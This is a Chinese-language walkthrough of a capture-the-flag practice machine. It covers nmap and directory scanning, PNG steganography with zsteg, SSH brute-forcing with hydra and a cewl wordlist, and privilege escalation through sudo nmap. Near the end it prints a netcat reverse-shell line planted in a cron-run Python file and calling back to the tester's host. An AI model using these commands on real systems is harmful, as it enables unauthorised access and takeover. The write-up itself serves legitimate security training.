本台靶机的知识点有png隐写技术还有就是有3个用户
常规nmap扫描有22 和 80端口
看看源码
解密一下解密不出来
爆破目录,在/imagess目录下正好是这两张照片,对目录详细爆破以下,加-X .php,.js,.txt试试
在/users.js
,访问得到两个用户名 skywalker、han
然后目前没有被的思路让我们看看会不会有图片隐写
将图片下载到本地,file ,binwalk看一下
zsteg可以检测PNG和BMP图片里的隐写数据。使用 zsteg -a
得到密码 babyYoda123
你也可以使用线上破解
现在我们得到了账号和密码,这边账号密码少可以一个个尝试,这边使用hydra
Hydra -L users.txt -p BabyYoda123 192.168.0.188 ssh
有效的用户名:han和密码:babyYoda123。
现在ssh连接它
准备提权
在 han
家目录下有一个文件夹 .secrets
,内有一个 note.txt
,查看内容
作者希望我们使用 Cewl 来制作单词列表。
让我们检查以下有哪些用户在/etc/passwd里面看
有个用户skywalker有/bin/bash
在上面目录爆破中robots.txt,其中给出了 /r2d2 的提示
cewl http://192.168.0.188/r2d2 > dict.txt
hydra -l skywalker -P dict.txt 192.168.0.188 ssh
切换用户
切换用户后,我们发现了一个名为.secret的隐藏目录。经过探索,我们发现该目录包含一个名为“note.txt”的文本文件。这个文件可以给我们一个提示,所以我们决定检查一下。在文件中,作者提到:“达斯必须承担起成为一名好父亲的职责”。由此,我们可以确定Darth就是该用户。
切换到主目录后,我们发现一个名为 Darth 的文件夹,其中包含一个名为.secrets的隐藏目录,其中包含一个 python 文件“evil.py”。有一个可读写的可执行python文件,并且该文件在一分钟后正在执行。
vim evil.py
import os
os.system("nc -e /bin/bash 192.168.0.147 1234")
kali监听1234端口
成功得到Darth 用户
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
我们发现用户Darth拥有NMAP的sudo权限
nmap的--script执行脚本,我们直接创建一个反弹shell脚本给它执行就可以得到root权限